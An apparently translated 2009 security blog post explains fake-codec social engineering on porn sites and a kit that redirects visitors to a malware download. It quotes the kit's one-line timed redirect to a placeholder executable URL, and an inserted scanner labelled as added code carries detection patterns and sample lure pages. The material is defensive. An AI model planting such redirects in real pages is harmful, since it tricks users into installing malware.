Tuesday, January 27, 2009

Deception techniques that do not go out of fashion

Do we only learn the hard way?

One question that prompts daily reflection is why some users still fall into traps that are old and well known.

Social engineering techniques such as double-extension files, padding spaces between the file name and the extension and, ever since the Internet began to be used as an attack platform, tricks such as fake codecs are just a small sample of them.

Web sites hosting pornographic material are the most visited online, and also the most used by malware distributors to spread threats. Rather than asking how it is still possible for users to keep infecting their computers through these deception strategies, the answer seems to lie in something as simple as the "high demand" for that kind of content, which is among the most sought after.

Malware creators know this well: whoever visits a pornographic site wants to see pornography, regardless of the format the content comes in (video and/or images). So if the user is offered a download, even a fake codec supposedly needed to play the video, in most cases the user will most likely download it.

The user then sees something like the screen shown in the capture, which after a few seconds displays a pop-up similar to the following:

The user, believing it is a codec needed to play the video, installs it. In fact, what gets installed is malware, which to date is detected by only some antivirus vendors.

There is also an application, consisting of an HTML file, that is spread massively by any available means in order to carry out this type of action.

The application does not create or modify malicious code; it only provides the means to spread it through the classic technique just described. The only requirements are to host it on a server (or a zombie PC) and to specify, in the HTML code, the download address of the malware in the following portion of code:

window.setTimeout("location.href = 'http://servidor.com/archivo.exe'", 1000);

As an additional component, the kit also offers to redirect the user to a real video afterwards. This is part of the social engineering strategy and aims to dispel any suspicion on the user's part.
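From the defender's side, the kit's one-liner is easy to spot in page source or proxy captures: a `setTimeout` whose body assigns `location` to a URL ending in an executable extension. The following is an added example, not code from the original post or from the kit it describes; it scans HTML/JS source for that timed-redirect pattern and also flags the double-extension trick mentioned earlier. The sample page is constructed here (the `servidor.com/archivo.exe` URL is the post's own placeholder), and the list of executable extensions is an assumption that a deployment would tune.

```javascript
// Added example (not from the original post): static scanner for the
// "setTimeout -> location = <executable URL>" pattern used by fake-codec kits.

// Assumed list of extensions worth flagging; adjust for your environment.
const EXECUTABLE_EXTENSIONS = new Set([
  "exe", "scr", "com", "pif", "bat", "cmd", "msi", "vbs",
]);

// setTimeout(<body>, <delay>) with either a string body or a function body.
// The lazy match stops at the first ", <digits>)" which is the delay argument.
const TIMEOUT_CALL = /setTimeout\s*\(([\s\S]*?),\s*(\d+)\s*\)/g;

// Assignment to location / location.href / window.location inside the body.
const LOCATION_ASSIGN = /(?:window\.)?location(?:\.href)?\s*=\s*(["'])([^"']+)\1/;

// Classify a file name: is the final extension executable, and is it hidden
// behind another extension (e.g. video.avi.exe)? Names like setup.v1.exe
// also count as double extensions; this is a heuristic, not a verdict.
function classifyFilename(filename) {
  const parts = filename.toLowerCase().split(".");
  if (parts.length < 2) return { executable: false, doubleExtension: false };
  const ext = parts[parts.length - 1];
  const executable = EXECUTABLE_EXTENSIONS.has(ext);
  return { executable, doubleExtension: executable && parts.length >= 3 };
}

// Return every timed redirect whose target file name looks executable.
function findTimedExecutableRedirects(source) {
  const findings = [];
  for (const m of source.matchAll(TIMEOUT_CALL)) {
    const [, body, delay] = m;
    const loc = body.match(LOCATION_ASSIGN);
    if (!loc) continue;
    const url = loc[2];
    let filename;
    try {
      // Base URL only matters for relative targets; the host is a placeholder.
      filename = new URL(url, "http://placeholder.invalid/").pathname.split("/").pop();
    } catch {
      continue; // unparsable URL: nothing to classify
    }
    const cls = classifyFilename(filename);
    if (cls.executable) {
      findings.push({ url, delayMs: Number(delay), doubleExtension: cls.doubleExtension });
    }
  }
  return findings;
}

// Constructed sample page: one benign delayed navigation, the kit's pattern
// from the post, and a double-extension variant inside a function body.
const SAMPLE_PAGE = `
<html><body>
<script>
// benign: delayed navigation to a real video page
window.setTimeout("location.href = 'video.html'", 3000);
// kit pattern: timed redirect straight to an executable
window.setTimeout ( "location.href = 'http://servidor.com/archivo.exe'", 1000);
// double-extension variant
setTimeout(function () { window.location = "http://servidor.com/video.avi.exe"; }, 500);
</script>
</body></html>`;

console.log(JSON.stringify(findTimedExecutableRedirects(SAMPLE_PAGE), null, 2));
```

Running it reports the two executable redirects (with their delays, 1000 ms and 500 ms) and marks the `.avi.exe` one as a double extension, while the redirect to `video.html` is ignored. The delay is kept in the output because a very short timer before a redirect to a binary is itself a useful triage signal.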

We are no longer talking only about techniques such as drive-by download, exploits, scripting or code obfuscation, among many others; we are talking about caution and common sense.

It is not enough to leave the security risks caused by malicious code to antivirus solutions alone: in this case, according to the VT (VirusTotal) report, antivirus engines currently offer only 35.09% protection, with just 14 of 39 detecting the threat. The remaining 64.91% depends largely on our own ability and common sense to spot potentially malicious activity.

# Jorge Mieres
